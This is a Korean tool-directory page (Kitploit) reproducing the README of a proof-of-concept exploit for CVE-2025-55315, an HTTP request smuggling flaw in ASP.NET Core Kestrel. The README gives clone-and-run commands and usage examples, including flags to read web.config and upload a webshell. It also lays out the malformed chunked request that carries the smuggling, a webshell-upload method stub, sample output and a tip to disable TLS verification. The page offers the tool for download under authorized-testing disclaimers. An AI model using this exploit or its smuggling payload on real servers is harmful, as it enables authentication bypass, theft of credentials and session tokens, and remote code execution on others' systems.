Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC 악용 | Kitploit
도구/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC 악용

저장소 보기
85310개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55315 침투 테스트 도구

ASP.NET Core Kestrel을 위한 HTTP 요청 밀반입 공격 도구

Python Version CVE CVSS License


⚠️ 법적 경고

본 도구는 승인된 보안 테스트 전용입니다!

  • 소유하고 있거나 명시적 서면 승인을 받은 시스템에서만 사용하십시오.
  • 무단 컴퓨터 시스템 접근은 불법입니다.
  • 도구 제작자는 오용에 대해 책임을 지지 않습니다.
  • 본 도구를 사용함으로써 귀하는 모든 법적 책임을 수락합니다.

📋 개요

CVE-2025-55315 (ASP.NET Core Kestrel HTTP 요청 밀반입 취약점)에 대한 전문 침투 테스트 도구입니다. 단일 대상 분석을 위해 설계되었으며 포괄적인 공격 기능을 제공합니다.

CVE-2025-55315란?

ASP.NET Core Kestrel 웹 서버의 치명적인 HTTP 요청 밀반입 취약점(CVSS 9.9/10)으로, 공격자가 다음을 수행할 수 있습니다:

  • 인증 우회
  • 자격 증명 및 세션 토큰 탈취
  • 서버 측 요청 위조(SSRF) 수행
  • 캐시 오염
  • 웹쉘 업로드 및 원격 코드 실행

영향을 받는 버전:

  • .NET Core 3.0 ~ .NET 9.0.9
  • 해결된 버전: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ 기능

핵심 기능

  • ✅ 단일 대상 분석 - 특정 대상에 집중된 침투 테스트
  • ✅ 자동 엔드포인트 발견 - 일반적인 ASP.NET Core 엔드포인트 자동 탐색
  • ✅ 수동 엔드포인트 테스트 - 관심 있는 특정 엔드포인트 테스트
  • ✅ 취약점 탐지 - 정확한 CVE-2025-55315 탐지
  • ✅ web.config 추출 - 요청 밀반입을 통한 설정 파일 읽기
  • ✅ 웹쉘 업로드 - 선택적 웹쉘 배포 기능
  • ✅ 상세 보고 - JSON 및 텍스트 형식 보고서
  • ✅ 안전 기능 - 파괴적 작업에 대한 다중 확인 프롬프트

기술적 기능

  • HTTP/1.1 및 HTTPS 지원
  • 사용자 지정 포트 지원
  • 구성 가능한 타임아웃
  • 상세 디버깅 모드
  • 색상 구분 터미널 출력
  • SSL 인증서 확인 우회(테스트용)

🔧 설치

요구 사항

root@kitploit:~
# Python 3.7 이상
python3 --version

# 외부 종속성 없음 - 표준 라이브러리만 사용

다운로드

root@kitploit:~
# 저장소 복제 또는 다운로드
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# 실행 가능하도록 설정
chmod +x cve_2025_55315_PoC.py

🚀 빠른 시작

기본 취약점 스캔

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

이 명령은:

  1. 서버 정보 수집
  2. 활성 엔드포인트 자동 발견
  3. 각 엔드포인트에서 CVE-2025-55315 테스트
  4. 터미널에 결과 표시

특정 엔드포인트 테스트

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

web.config 추출을 포함한 전체 스캔

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

고급: 전체 익스플로잇 (승인된 경우에만!)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 사용 예제

예제 1: 빠른 확인

시나리오: 프로덕션 서버가 취약한지 확인

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

예상 소요 시간: 30~60초


예제 2: 상세 스캔

시나리오: 상세 출력을 포함한 포괄적인 엔드포인트 스캔

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

예상 소요 시간: 2~5분


예제 3: 여러 엔드포인트 대상

시나리오: 특정 중요 엔드포인트 테스트

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

예제 4: 비 SSL 대상

시나리오: 내부 HTTP 서버 테스트

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 명령줄 옵션

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

필수 인자:
  -t, --target         대상 호스트명 또는 URL (예: target.com)

선택 인자:
  -p, --port           포트 번호 (기본값: SSL 443, 비 SSL 80)
  -e, --endpoint       테스트할 특정 엔드포인트 (여러 번 사용 가능)
  --no-ssl             SSL/HTTPS 비활성화 (HTTP 사용)
  --read-config        web.config 파일 읽기 시도
  --upload-shell       웹쉘 업로드 시도 (확인 필요)
  -o, --output         보고서를 파일로 저장
  -v, --verbose        상세 출력 활성화
  --timeout            소켓 타임아웃(초) (기본값: 10)
  -h, --help           도움말 메시지 표시

🔍 출력 이해하기

취약한 시스템 예시

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

해석:

  • 🔴 치명적 취약점 탐지됨
  • 🔴 여러 엔드포인트가 취약함
  • 🔴 설정 파일이 성공적으로 추출됨
  • ⚡ 긴급: .NET 8.0.21+ 또는 9.0.10+로 업데이트하십시오

안전한 시스템 예시

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

해석:

  • ✅ 시스템이 안전함
  • ✅ 패치된 Kestrel 버전 실행 중
  • ✅ 모든 비정상 요청이 거부됨

🛡️ 안전 및 윤리

승인 확인 목록

이 도구를 실행하기 전에 다음을 확인하십시오:

  • 대상 시스템을 소유하고 있거나,
  • 서면 테스트 승인을 받았으며,
  • 보안 팀에 통보했으며,
  • 롤백 계획이 있으며,
  • 법적 영향을 이해합니다.

내장 안전 기능

  1. 2단계 확인 - 도구가 시작 전 사용자 확인 요청
  2. 웹쉘 업로드 확인 - 대문자로 "YES" 입력 필요
  3. 속도 제한 - 자동 발견 시 요청 간 지연
  4. 타임아웃 보호 - 연결 끊김 방지
  5. 상세 로깅 - 모든 작업이 감사 기록에 남음

🔬 기술 상세

공격 기법

이 도구는 CVE-2025-55315를 악용하기 위해 잘못된 청크 전송 인코딩을 사용합니다:

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← 취약점: \r\n 대신 단독 \n 사용
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← 이것이 별도의 요청이 됨
Host: target.com

작동 원리:

  1. 프록시 서버는 \n을 줄 종결자로 인식 → 단일 요청으로 처리
  2. 취약한 Kestrel은 \n을 무시 → 밀반입된 GET을 별도 요청으로 처리
  3. 밀반입된 요청은 다른 사용자의 세션 컨텍스트에서 실행될 수 있음

탐지 로직

서버 응답해석상태
400 Bad RequestKestrel이 잘못된 청크를 거부함✅ 안전 (패치됨)
다중 HTTP/1.1두 개의 별도 응답 수신❌ 취약
500 또는 502내부 서버 오류⚠️ 취약 가능성
정상 200 OK요청 수락⚠️ 불확실

🐛 문제 해결

연결 실패

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

해결 방법:

  • 대상에 연결 가능한지 확인: ping target.com
  • 포트 번호가 올바른지 확인
  • SSL 유무에 따라 시도: --no-ssl
  • 방화벽 규칙 확인

SSL 인증서 오류

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

해결 방법: 도구는 이미 인증서 확인을 비활성화합니다. 문제가 지속되면:

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

타임아웃 오류

root@kitploit:~
[WARNING] No response - possible timeout

해결 방법:

  • 타임아웃 증가: --timeout 30
  • 네트워크 연결 확인
  • 대상이 느리거나 과부하 상태일 수 있음

업로드 차단

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

설명:

  • 서버 구성이 PUT/POST 메서드를 차단함
  • WAF/IPS가 업로드를 차단함
  • 파일 권한으로 쓰기 불가

정상적인 현상입니다. 취약한 시스템이 항상 파일 업로드를 허용하지는 않습니다.


📚 참고 자료

CVE-2025-55315 관련 자료

  1. Microsoft 보안 권고: https://github.com/dotnet/aspnetcore/issues/64033

  2. NVD 데이터베이스: https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. Praetorian 연구 ($10,000 버그 바운티): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. Andrew Lock의 기술 분석: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

HTTP 요청 밀반입

  1. PortSwigger 연구: https://portswigger.net/web-security/request-smuggling

  2. OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 사용자 정의

사용자 정의 엔드포인트 추가

스크립트에서 COMMON_ENDPOINTS를 편집하십시오:

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # 여기에 엔드포인트 추가
]

사용자 정의 웹쉘 사용

upload_webshell() 메서드를 수정하십시오:

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- 여기에 사용자 정의 ASPX 웹쉘 작성 -->
        '''

📝 문제 보고

버그를 발견하거나 제안이 있으면:

  1. 상세 모드 실행: -v
  2. 전체 출력 저장: -o debug.txt
  3. 다음 정보 포함:
    • Python 버전
    • 사용한 명령어
    • 오류 메시지
    • 예상 동작과 실제 동작

⚖️ 법적 고지

root@kitploit:~
본 도구는 "있는 그대로" 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

저자:
❌ 불법 활동을 지지하지 않음
❌ 오용에 대해 책임지지 않음
❌ 어떠한 손해에 대해서도 책임지지 않음
❌ 법적 조언을 제공하지 않음

본 도구를 사용함으로써 귀하는 다음에 동의합니다:
✅ 승인된 시스템에서만 사용
✅ 모든 법적 책임 수락
✅ 모든 관련 법률 준수
✅ 윤리적 해킹 원칙 준수

무단 사용은 엄격히 금지되며 불법입니다!

🎓 교육 목적

이 도구는 다음을 위해 만들어졌습니다:

  • 보안 연구원
  • 침투 테스터
  • 버그 바운티 헌터
  • 시스템 관리자
  • 보안 인식 교육
  • 승인된 보안 평가

다음 용도로는 사용하지 마십시오:

  • 악의적인 공격
  • 무단 접근
  • 경쟁 정찰
  • 모든 불법 활동

🙏 감사의 말

  • Microsoft 보안 대응 센터 - CVE 공개 및 패치 제공
  • Praetorian Security - 원본 취약점 연구
  • Andrew Lock - 상세 기술 분석
  • 보안 커뮤니티 - 책임 있는 공개 관행

📄 라이선스

교육 및 승인된 보안 테스트 전용

이 도구는 교육 목적 및 승인된 보안 테스트를 위해 제공됩니다. 상업적 사용, 재배포 또는 악의적 목적의 사용은 엄격히 금지됩니다.


🔐 최종 경고

root@kitploit:~
╔══════════════════════════════════════════════════════════════════════╗
║                                                                      ║
║  이 도구를 책임감 있고 합법적으로 사용하십시오!                         ║
║                                                                      ║
║  무단 컴퓨터 시스템 접근은 범죄입니다.                                 ║
║  테스트 전 항상 서면 승인을 받으십시오.                                ║
║  책임 있는 공개 관행을 따르십시오.                                    ║
║                                                                      ║
║  행복한 (합법적인) 해킹 되세요!                                      ║
║                                                                      ║
╚══════════════════════════════════════════════════════════════════════╝
도구 다운로드